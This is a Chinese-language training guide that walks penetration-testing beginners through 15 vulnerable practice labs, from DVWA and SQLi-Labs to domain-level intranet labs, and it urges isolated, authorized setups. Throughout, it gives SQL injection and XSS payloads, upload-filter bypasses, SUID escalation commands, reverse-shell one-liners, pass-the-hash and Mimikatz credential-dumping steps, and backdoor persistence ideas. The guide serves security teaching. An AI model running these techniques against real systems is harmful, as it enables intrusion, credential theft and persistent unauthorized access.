1. 项目概述为什么靶场是渗透测试新手的“第一战场”刚入行网络安全尤其是对渗透测试感兴趣的朋友最常问我的一个问题就是“我该从哪里开始练手” 直接去测试真实网站那是违法的也是极不道德的。看理论书籍和视频看完了还是一头雾水不知道如何下手。我的回答永远只有一个靶场。靶场就是为你搭建好的、合法的、充满各种已知漏洞的“沙盒”环境。它就像驾校的训练场让你在撞坏多少遍“护栏”都没关系的情况下熟练掌握各种“驾驶”技巧。今天我就结合自己带新人、以及当年自己摸索的经验为你梳理出一条从零基础到精通的靶场实战路径。这15个靶场覆盖了Web渗透、系统提权、内网渗透等核心领域只要你跟着练下来不仅能建立起完整的知识体系更能积累宝贵的“手感”为后续参与真实项目或CTF比赛打下坚实基础。2. 靶场整体学习路线与核心价值解析2.1 新手入门建立认知与基础操作对于零基础的朋友首要目标不是攻克复杂漏洞而是熟悉渗透测试的基本流程和工具。这个阶段靶场环境通常简单、漏洞类型单一且提示明显目的是让你理解“渗透测试到底在做什么”。核心价值流程固化你会反复实践“信息收集 - 漏洞扫描与探测 - 漏洞利用 - 权限获取与维持 - 报告编写”这个标准流程直到它成为你的肌肉记忆。工具入门学会使用Nmap进行端口扫描用Dirsearch或Gobuster进行目录爆破用Burp Suite拦截和修改HTTP请求用Sqlmap进行自动化SQL注入测试。在简单的靶场里你能清晰地看到每个工具输入和输出对应的实际意义。漏洞原理直观化理论上的“SQL注入”是抽象的但当你在一个登录框输入‘ or ‘1’’1并成功绕过登录时这个概念就瞬间具体了。这个阶段切忌贪多求快。把一个简单漏洞的多种利用方式吃透远比浅尝辄止地接触十个漏洞更有价值。2.2 进阶提升漏洞组合与思维拓展当你对基础漏洞和工具使用不再陌生后就需要进入进阶靶场。这类靶场的特点是漏洞场景更贴近真实、可能需要多个漏洞串联利用、并且干扰信息增多。核心价值逻辑思维训练真实网络很少只有一个孤立的漏洞。你需要像解谜一样发现A漏洞只能获取有限信息利用这个信息去触发B漏洞最终才能拿到目标。这训练的是你的串联思维和攻击路径规划能力。绕过技巧实践很多靶场会设置简单的WAFWeb应用防火墙或过滤规则逼迫你去思考如何绕过。例如SQL注入过滤了空格和select你是否知道用/**/代替空格用SeLeCt进行大小写混淆手动利用深度减少对自动化工具如Sqlmap的依赖尝试手动构造Payload。这能让你真正理解漏洞的底层原理比如Union注入时如何判断字段数、如何确定回显点。2.3 综合实战模拟真实环境与内网渗透这是通向“精通”的关键一步。综合靶场通常是一个完整的、模拟企业内网的环境你可能需要从外网的一个Web应用入手逐步突破边界进入内网横向移动最终控制整个域环境。核心价值完整生命周期体验你会经历一次完整的渗透测试外网打点、突破边界、权限提升、信息收集本地密码、网络拓扑、横向移动PTH、PTT等、域渗透、权限维持、清理痕迹。这是书本上极难获得的综合体验。内网技术栈构建你会大量接触Windows域、Active Directory、Kerberos协议、PsExec、WMI、Smbexec等内网渗透核心概念和工具理解“横向移动”的真正含义。复杂问题解决能力环境更复杂问题也更刁钻。可能会遇到杀毒软件、应用白名单、严格的网络分区等。你需要灵活运用免杀技术、合法工具Living-off-the-Land Binaries和多种协议来达成目标。注意靶场练习一定要在授权和隔离的环境中进行。通常使用VMware或VirtualBox搭建本地虚拟机环境确保所有攻击行为仅限于虚拟网络内部与你的物理主机和外部互联网完全隔离。3. 新手必练15个靶场深度解析与实操指南下面我将这15个靶场分为入门、进阶、综合实战三大类并为你详解每个靶场的核心学习点、通关思路以及我踩过的坑。3.1 入门奠基篇5个这类靶场目标明确漏洞独立是建立信心的最佳选择。1. DVWA定位Web渗透的“Hello World”。核心学习点安全级别调节从Low到Impossible让你直观感受安全防护等级提升对攻击难度的影响。十大经典漏洞SQL注入、命令执行、文件包含、文件上传、XSS、CSRF等均有涵盖且代码简单易于理解漏洞成因。Burp Suite初体验配合Low级别是练习Burp Suite抓包、改包、重放、Intruder模块爆破的绝佳场地。实操心得从Low级别开始手动完成所有漏洞利用。然后查看源代码理解为什么存在漏洞。切换到Medium或High级别尝试绕过简单的过滤如转义单引号、检查Token。这时不要急着看源码先自己思考可能的绕过方法。我踩过的坑早期过于依赖Sqlmap等工具导致对漏洞原理一知半解。建议在DVWA中所有SQL注入都先尝试手动构造Union查询理解信息获取的全过程。2. SQLi-Labs定位专攻SQL注入的“高考题库”。核心学习点注入类型全覆盖数字型、字符型、报错注入、Union注入、布尔盲注、时间盲注、堆叠查询、二次注入等。过滤与绕过后续关卡引入了各种过滤如括号、空格、关键词逼迫你掌握/**/、()、like、mid()、substr()等绕过技巧。手动注入思维这个靶场几乎强制你进行手动注入从判断注入点、确定字段数、寻找回显位到一步步拖取数据库名、表名、列名、数据形成完整链条。通关思路Less-1到Less-4掌握基础联合查询注入。Less-5到Less-6重点攻克布尔盲注和时间盲注学会使用length()和substr()函数逐位猜解数据。Less-7到Less-10学习利用into outfile进行文件写入写Webshell理解绝对路径的重要性。后面的关卡逐一挑战各种过滤绕过。我踩过的坑在盲注关卡一开始总是心急手工猜解效率极低。后来学会编写简单的Python脚本自动化这个过程效率提升巨大。这也是一个重要的学习点将重复劳动自动化。3. XSS-Labs定位专攻XSS的“训练营”。核心学习点XSS三种类型反射型、存储型、DOM型以及它们的区别和利用场景。过滤与编码绕过靶场设置了逐步升级的过滤规则如过滤script、onclick、href中的javascript:等你需要学习使用大小写、双写、HTML实体编码、JavaScript编码、利用其他标签如img、svg等方法来绕过。Payload构造从简单的弹窗scriptalert(1)/script到窃取Cookie的Payload再到结合CSRF的利用层层递进。实操心得每过一关一定要看前端的过滤函数和后端的处理代码明白你的Payload是如何被处理以及为什么最终能执行。理解防御逻辑是构造攻击Payload的前提。4. Upload-Labs定位文件上传漏洞的“百科全书”。核心学习点客户端校验绕过前端JavaScript校验直接禁用JS或Burp改包即可。服务端校验绕过MIME类型校验修改Content-Type为image/jpeg等。文件扩展名校验黑名单/白名单机制。黑名单可通过.php5,.phtml,.phps等特殊扩展名或利用.php.Windows会自动去除末尾点绕过。白名单则需结合文件包含、.htaccess解析漏洞等。文件内容校验检查文件头如GIF89a、二次渲染。针对二次渲染需要找到渲染前后不变的数据块将Webshell代码插入其中。条件竞争在文件被删除前访问它利用时间差。我踩过的坑在Windows环境下练习时忽略了::$DATA等NTFS流特性以及文件名末尾加点、空格等绕过技巧这些在特定环境下非常有效。5. Pikachu定位涵盖Web漏洞的“综合游乐场”。核心学习点在DVWA基础上增加了更多漏洞类型和场景如暴力破解有验证码和无验证码场景、CSRFGET/POST型、RCE、越权访问水平越权、垂直越权、SSRF、XXE等。每个漏洞都有前后端源码适合在理解DVWA后拓宽知识面。实操心得Pikachu的“不安全的URL跳转”、“目录遍历”等漏洞相对简单但却是真实环境中高发的“低危”漏洞它们往往能与其他漏洞结合成为突破点切勿忽视。3.2 进阶突破篇5个这部分靶场开始需要动脑筋漏洞利用链开始出现。6. Webug 4.0定位国内团队出品环境贴近国内实际关卡设计有剧情。核心学习点漏洞串联不再是孤立的漏洞点。你需要通过一个入口如SQL注入获取后台地址和密码登录后可能又发现文件上传点上传Webshell后进一步提权。基础提权涉及简单的系统命令执行和权限提升思路。信息收集深度需要更细致地收集网站信息、服务器信息从中发现突破口。通关思路把它当作一个微型“渗透项目”来做每一步操作都记录下来思考当前权限能做什么如何获取更高权限。7. Vulhub定位真实世界漏洞的“一键复现环境”。核心学习点真实漏洞复现Vulhub不是传统关卡式靶场它提供了Docker Compose文件可以一键搭建如ThinkPHP 5.x RCE、Struts2系列漏洞、Jenkins未授权访问、Redis未授权访问等历史上真实存在的、影响广泛的漏洞环境。漏洞研究与分析在复现过程中你可以结合漏洞公告CVE详情和利用脚本如Exploit-DB上的脚本深入理解漏洞的根源和利用方式。Docker环境使用熟悉基本的Docker命令如docker-compose up -d启动环境docker ps查看容器docker exec进入容器等。实操心得不要只满足于运行Exp拿到Shell。尝试去阅读漏洞分析文章理解漏洞触发的代码位置和原理。这是从“脚本小子”迈向“安全研究员”的关键一步。8. DC系列靶机定位VulnHub上的经典入门CTF靶机如DC-1, DC-2, DC-3, DC-4, DC-5等。核心学习点完整渗透流程从外网扫描发现靶机到Web渗透获取Shell再到系统内提权通常是Linux下的内核漏洞或SUID程序滥用最终获取root权限并找到flag。工具链综合运用需要灵活组合使用Nmap、Nikto、WPScan、Metasploit、Searchsploit等工具。提权技术这是DC系列的重点。你会遇到脏牛漏洞Dirty Cow、利用find/vi等具有SUID权限的程序提权、利用定时任务Cron提权等经典场景。我踩过的坑DC-1中拿到Webshell后发现是www-data权限直接去找内核Exp结果发现系统版本不对。后来通过信息收集发现find命令有SUID位才成功提权。提权前一定要做详细的信息收集uname -a看内核find / -perm -us -type f 2/dev/null找SUID程序sudo -l看当前用户的sudo权限。9. HackTheBox / TryHackMe 上的简单机器定位国际化的在线实战平台。核心学习点真实环境模拟这些平台上的机器尤其是退役的Easy级别机器高度模拟了真实世界的配置和漏洞。独立解决问题没有现成的“关卡提示”你需要自己制定攻击路径面对未知。社区与学习资源HTB和THM有强大的社区和官方/非官方的Writeup解题报告当你卡住时可以参考别人的思路但最好先自己努力尝试。实操建议从TryHackMe的“入门路径”或HackTheBox上标记为“Easy”的退役机器开始。注册账号后通常需要先完成一个简单的挑战如HTB的邀请码生成才能激活账户这个过程本身也是一个学习。10. 74cms靶场定位针对特定CMS内容管理系统的漏洞挖掘与利用。核心学习点审计真实CMS代码学习如何在海量源代码中寻找潜在的安全问题例如未过滤的用户输入点、危险的函数调用如eval,system、SQL拼接处等。漏洞利用链构造这类靶场的漏洞往往需要多个步骤才能利用例如先通过一处注入获取管理员密码哈希破解后登录后台再利用后台功能如模板编辑写入Webshell。黑盒与白盒结合你可以先用工具对安装好的74cms进行黑盒扫描发现疑似漏洞点再结合源代码进行白盒审计验证并深入理解漏洞。实操心得对于这类靶场学会使用代码编辑器的全局搜索功能至关重要。搜索关键词如$_GET,$_POST,echo,include,eval等能快速定位到关键代码段。3.3 综合实战篇5个挑战这些靶场意味着你开始接触企业级安全攻防。11. 红日靶场系列定位国内最经典的模拟真实内网渗透靶场尤其是红日靶场1VulnStack。核心学习点完整内网渗透流程这是红日靶场的核心价值。你会完整实践外网打点通常是一个存在漏洞的Web应用- 获取Webshell - 权限提升Windows/Linux- 内网信息收集主机发现、端口扫描、凭据获取- 横向移动PTH/PTT SMB/WMI执行命令- 域渗透获取域管权限 DCSync导出所有哈希- 权限维持 - 清理痕迹。域环境理解深刻理解Active Directory、域用户、域管理员、域控制器、Kerberos认证、黄金票据/白银票据等概念。工具集大成你会用到几乎所有的内网渗透工具MSF、Cobalt Strike、Impacket套件如psexec.py, wmiexec.py, secretsdump.py、Mimikatz、BloodHound、PowerShell Empire等。通关思路以红日1为例信息收集发现目标IP扫描开放端口80 445等。Web突破访问80端口发现是某CMS利用已知漏洞如ThinkPHP或弱口令进入后台通过文件上传或编辑模板获取Webshell。权限提升在Web服务器上利用系统漏洞如MS17-010或错误配置提权至System/Administrator权限。内网探测上传fscan/nmap等内网扫描工具发现内网网段和其他存活主机如域控制器192.168.52.138。凭据获取在Web服务器上使用Mimikatz或直接读取文件获取本地管理员密码或哈希。运气好可能抓到域用户的密码。横向移动利用获取的凭据通过SMB或WMI协议向域控制器或其他主机发起攻击。使用psexec或wmiexec执行命令。域控攻陷通过横向移动到域控制器再次使用Mimikatz抓取域内所有用户的哈希NTDS.dit或利用Kerberos漏洞如MS14-068伪造票据。权限维持在域控制器上创建隐藏后门账户、部署计划任务、安装SSH后门等。我踩过的坑血泪教训网络配置虚拟机网络一定要设置为“仅主机模式”或自定义的隔离网络确保攻击机Kali和靶机Win7 Win2k8在同一网段且能互通同时绝对不能让靶机连接到我的真实公司网络或互联网。杀毒软件靶机尤其是Windows可能装有杀软直接上传Mimikatz.exe会被秒杀。需要学习免杀技巧或使用无文件落地的方式如PowerShell加载Mimikatz脚本。工具版本Impacket版本过旧可能导致psexec.py连接失败。保持工具更新很重要。耐心与记录内网渗透步骤繁多容易混乱。务必做好操作记录画一下简单的网络拓扑图明确自己当前在哪台机器有什么权限下一步目标是什么。12. 玄机靶场定位基于开源漏洞平台包含多种难度和场景的挑战。核心学习点场景多样性除了常规Web漏洞可能包含移动端App逆向、IoT设备固件分析、代码审计等不同方向的挑战。CTF解题思维部分关卡更偏向CTF模式需要一定的密码学、逆向工程或隐写术知识。自主搭建与学习你可以下载其环境自行搭建研究每一关的源码和设计思路。实操心得适合在掌握了主流Web渗透后拓宽自己的技能边界。遇到不熟悉的领域如安卓逆向正好是逼迫自己学习新知识的机会。13. BugKu 渗透测试区题目定位国内知名CTF平台BugKu中的渗透测试实战题目。核心学习点实战化CTF题目通常是一个精简的、目标明确的小场景例如“拿到网站根目录下的flag文件”。你需要运用各种渗透技巧达成目标。脑洞与技巧有时需要一些非常规的思路或对某个冷门漏洞的深入了解。时间压力在线平台通常会计时锻炼在压力下的问题解决能力。实操建议从简单的题目开始刷起。BugKu的题目通常有Writeup但同样建议自己先苦思冥想一段时间实在无法突破再看提示这样成长最快。14. 安卓逆向靶场-by挽风定位专注于移动端安全的专项靶场。核心学习点APK逆向基础学习使用Jadx-GUI、JEB、Apktool等工具反编译APK阅读Smali或Java代码。静态分析与动态调试通过静态分析找到关键验证函数使用Frida、Xposed等框架进行动态Hook和调试绕过验证逻辑。协议分析与抓包配合Burp Suite或Fiddler对App的网络请求进行抓包分析其API接口和通信协议寻找漏洞。实操心得移动端安全是渗透测试的重要分支。这个靶场能带你入门。关键是要搭建好Android模拟器如Genymotion和抓包环境配置Burp的CA证书到手机。15. 自建漏洞环境定位渗透测试能力的“终极试炼”。核心学习点深度理解漏洞要搭建一个漏洞环境你必须彻底吃透这个漏洞的原理、触发条件、利用方式和修复方案。全栈技能你可能需要配置Web服务器Apache/Nginx、数据库MySQL、编程语言环境PHP/Python甚至编写有漏洞的代码。教学与分享为自己或他人搭建一个用于练习和演示的环境是巩固知识的最佳方式。如何开始可以从最简单的开始比如用Dockerfile构建一个包含旧版Struts2漏洞的镜像或者用PHP写一个存在SQL注入的登录页面。之后逐渐增加复杂度例如模拟一个包含前端JS校验、服务端MIME校验和内容校验的文件上传功能。4. 靶场练习的通用方法论与避坑指南4.1 工具准备与环境搭建工欲善其事必先利其器。一个稳定、高效的渗透测试环境至关重要。核心工具清单攻击机Kali Linux是首选。它预装了绝大多数渗透测试工具。建议使用虚拟机安装并做好快照。靶机根据靶场要求下载对应的OVA/ISO镜像用VMware或VirtualBox导入。务必使用“仅主机模式”或自定义的私有网络将攻击机和靶机置于同一虚拟网络内并与物理网络隔离。必备工具信息收集Nmap, Masscan, Dirsearch/Gobuster, WhatWeb, Wappalyzer (浏览器插件)漏洞扫描Nessus, OpenVAS, AWVS (有社区版)但新手慎用容易产生依赖。代理与抓包Burp Suite Community/Professional Fiddler漏洞利用Metasploit Framework, Sqlmap, SearchsploitWebShell管理AntSword (中国蚁剑), Behinder (冰蝎), Cobalt Strike内网渗透Impacket套件, Mimikatz, PowerSploit, BloodHound密码破解Hashcat, John the Ripper环境搭建避坑指南网络不通这是最常见问题。检查虚拟机的网络适配器设置是否在同一网段如Kali和靶机都设置为VMnet8并确认IP地址在同一子网如192.168.1.x。关闭防火墙靶机上systemctl stop firewalld(CentOS) 或ufw disable(Ubuntu)。靶机服务未启动启动靶机后用攻击机ping一下靶机IP能通再看端口。在靶机内部用netstat -tulnp查看关键服务如80端口的Web服务3306端口的MySQL是否在监听。工具安装失败Kali下尽量使用apt update apt install安装。遇到依赖问题仔细阅读错误信息使用apt -f install修复依赖或从GitHub源码编译安装。4.2 标准化渗透流程实践无论靶场简单还是复杂坚持一套标准流程能让你思路清晰避免遗漏。我的标准五步法信息收集主机发现nmap -sn 192.168.1.0/24扫描存活主机。端口扫描nmap -sV -sC -p- -oA target 192.168.1.100对目标进行全端口扫描识别服务版本和运行脚本。Web目录/文件扫描gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt指纹识别通过HTTP头、特定文件、页面内容识别CMS、框架、中间件。子域名枚举针对真实域名练习时使用subfinder,amass等。漏洞分析与探测根据信息收集结果手动测试常见漏洞点登录框SQL注入、弱口令、搜索框XSS、文件上传点、URL参数SSRF、文件包含。使用Burp Suite抓包观察所有请求和响应寻找异常点。对疑似注入点使用‘ and ‘1’’1和‘ and ‘1’’2进行初步布尔判断。漏洞利用确认漏洞后使用手动或工具进行利用。优先尝试手动理解原理。获取初步权限如Webshell、数据库权限、命令执行回显。权限提升与横向移动本地提权上传信息收集脚本如LinEnum.sh, winPEAS.bat查找系统漏洞、错误配置、弱密码、SUID/SGID文件、计划任务等。横向移动收集内网信息ipconfig /all,arp -a探测内网其他主机和端口。利用已获取的凭据密码/哈希尝试访问其他服务如SMB, WinRM, SSH。清理与报告靶场练习可跳过清理但要有意识。模拟报告养成记录习惯。用Markdown写一份简单的报告包含目标信息、发现漏洞、利用步骤、风险等级、修复建议。这是职业渗透测试师的必备技能。4.3 常见问题与排查技巧实录在靶场练习中你会反复遇到一些“坑”。这里记录一些高频问题的解决思路。问题1Sqlmap跑不出注入点但手动测试明明有回显。排查检查请求Burp抓包将整个请求包括Cookie、Headers保存到文件如req.txt用Sqlmap的-r参数加载sqlmap -r req.txt。指定参数用-p明确指定测试参数如sqlmap -u “url” -p “id,user”。调整级别和风险尝试--level 3 --risk 3提高测试的广度和深度。使用随机User-Agent加参数--random-agent。考虑延迟如果目标有速率限制添加--delay 1。根本原因Sqlmap的检测机制可能被WAF或应用程序的异常处理干扰。手动注入成功说明存在注入可能是Sqlmap的Payload被拦截或触发了不同的处理流程。问题2上传了Webshell如.php文件但访问返回404或空白。排查确认路径检查文件上传成功后的返回信息确认Webshell的完整访问URL。检查权限Webshell文件是否有可读权限在Linux上尝试chmod 644 shell.php。检查解析服务器是否真的将.php文件交给PHP解析器处理尝试上传一个包含的文件看是否执行。检查内容Webshell代码是否被破坏上传一个简单的?php phpinfo();?测试。检查目录是否上传到了有执行权限的目录有些目录如/uploads/可能配置了禁止执行脚本。问题3拿到了反向Shell连接但很快断开或不稳定。排查与解决升级Shell使用Python快速升级为TTY Shellpython -c ‘import pty; pty.spawn(“/bin/bash”)’ # 或者 python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ # 按CtrlZ挂起后在本地终端执行 stty raw -echo; fg使用稳定PayloadMSF的reverse_tcp可能不稳定尝试使用meterpreter或reverse_https。或者使用更稳定的独立Payload生成工具如msfvenom生成elf/exe。使用交互式工具尝试使用nc -e /bin/bash或/bin/bash -i /dev/tcp/ip/port 01。后台维持在Shell中使用nohup命令或创建计划任务、服务来维持持久化连接。问题4内网横向移动时使用获取的密码/哈希连接SMB或WMI失败。排查凭据有效性确认密码/哈希是否正确是否属于目标主机的有效用户如管理员组用户。协议与端口目标主机是否开放了445端口SMB或135端口WMI防火墙是否阻止工具与命令Impacketpython3 psexec.py domain/user:passwordtarget_ip或python3 wmiexec.py domain/user:passwordtarget_ip。注意用户名的格式域名/用户名或用户名域名。CrackMapExeccrackmapexec smb target_ip -u user -p password -x ‘whoami’是一个很好的测试工具。哈希传递限制目标系统是否启用了“受限管理模式”限制了PtH可以尝试使用-hashes选项传递NTLM哈希但需注意lmhash:nthash的格式如果LM哈希为空用aad3b435b51404eeaad3b435b51404ee填充。杀毒软件可能拦截了PsExec等工具的行为。尝试使用WMI或PowerShell Remoting等替代方法。问题5使用MSF的Exploit模块总是失败。排查目标检查check命令是否确认目标存在漏洞show options是否所有必选项都正确设置RHOSTS, RPORT, LHOST, LPORT, PAYLOADPayload兼容性选择的Payload是否与目标系统架构匹配x86/x64尝试更换Payload如generic/shell_reverse_tcp。防火墙与网络本地监听端口LPORT是否被占用或防火墙阻止攻击机与靶机网络是否互通模块版本与系统匹配有些Exp对系统版本、补丁级别、语言环境非常敏感。确认靶机环境是否与模块要求一致。手动验证如果MSF模块是基于公开PoC的尝试找到原始的Python/Exploit脚本手动运行可能更直接。靶场练习是渗透测试学习中最具实践性的环节没有之一。它搭建了从理论到实战的桥梁。这15个靶场从易到难基本涵盖了一名渗透测试工程师成长所需的核心技能树。我的建议是沉下心来一个一个攻克。每完成一个靶场不仅要会“通关”更要问自己“为什么能通”背后的原理是什么有没有其他方法做好笔记绘制攻击路径图。当你能够独立完成红日靶场这样的综合内网渗透时恭喜你你已经从“新手村”毕业具备了在真实安全项目中担任初级渗透工程师的潜力。记住靶场之外更重要的是持续学习的心态和对安全的敬畏之心。